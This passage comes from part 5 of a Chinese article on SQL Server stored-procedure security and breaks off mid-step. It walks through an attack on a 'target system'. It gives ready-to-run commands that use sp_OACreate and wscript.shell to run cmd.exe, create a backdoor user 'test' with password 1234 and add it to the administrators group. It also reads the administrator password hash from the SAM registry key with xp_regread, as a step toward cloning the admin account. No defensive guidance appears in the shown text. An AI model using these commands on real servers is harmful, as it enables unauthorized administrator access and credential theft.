SQL Server中存储过程的安全问题(5)

还有OLE相关的一系列存储过程，这系列的存储过程有sp_OACreate，sp_OADestroy，sp_OAGetErrorInfo，sp_OAGetProperty，sp_OAMethod，sp_OASetProperty，sp_OAStop，这些存储过程和xp_cmdshell一样危险，使用方法：

DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'c:\WINNT\system32\cmd.exe /c net user test 1234 /add'--

这样对方系统增加了一个用户名为test，密码为1234的用户，再执行：

DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'c:\WINNT\system32\cmd.exe /c net localgroup administrators test /add '--

用户test，被加入管理员组。

再来看一下如何克隆管理员帐号，把已经停用的GUEST用户启动起来，在查询分析器里运行下面的语句：

xp_regread 'HKEY_LOCAL_MACHINE','SAM\SAM\Domains\Account\Users\000001F4','F'

可以得到系统administrator的加密密码，然后复制(如图6)，